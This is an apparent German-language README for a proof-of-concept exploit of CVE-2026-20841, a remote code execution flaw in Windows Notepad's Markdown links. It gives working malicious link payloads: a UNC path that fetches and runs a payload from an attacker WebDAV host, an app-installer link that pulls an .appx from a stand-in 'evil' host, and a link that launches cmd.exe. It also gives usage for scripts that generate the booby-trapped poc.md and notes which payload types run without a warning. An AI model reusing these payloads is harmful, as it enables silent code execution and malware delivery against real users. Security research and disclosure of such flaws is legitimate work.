
Proof-of-Concept-Exploit für CVE-2026-20841, eine Windows-Notepad-RCE über Markdown-Links. Erzeugt manipulierte .md-Dateien, um Remote-Payloads, App-Sideloading oder die lokale Ausführung von Binärdateien auszulösen.
PoC für eine Schwachstelle zur Remote-Codeausführung im Markdown-Renderer von Windows Notepad. Die Markdown-Engine schränkt URL-Protokolle nicht ein, sodass über klickbare Links beliebige Protokoll-Handler ausgelöst werden können.
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
Das file:///-Protokoll löst entfernte UNC-Pfade auf. Verlinken Sie eine Payload und Windows holt sie sich und führt sie beim Klick aus.
ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
Öffnet den App-Installer mit einem vom Angreifer bereitgestellten .appx/.msix-Paket.
file://)[click](file://C:/windows/system32/cmd.exe)
Startet jede bereits auf der Festplatte vorhandene ausführbare Datei – cmd.exe, powershell.exe, mshta.exe usw.
Beide Skripte erzeugen eine poc.md mit einem manipulierten Link im aktuellen Verzeichnis.
node poc.js <host> <port> <payload/pfad>
python poc.py <host> <port> <payload/pfad>
# Beispiel
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
Test-Payloads in payloads/.
.exe, .lnk, .vbs und ähnliche lösen unabhängig vom Verhalten von Notepad eine Windows-Sicherheitswarnung aus..py und .jar werden still ausgeführt, wenn Python oder Java auf dem Zielsystem installiert ist.Bleiben Sie sicher!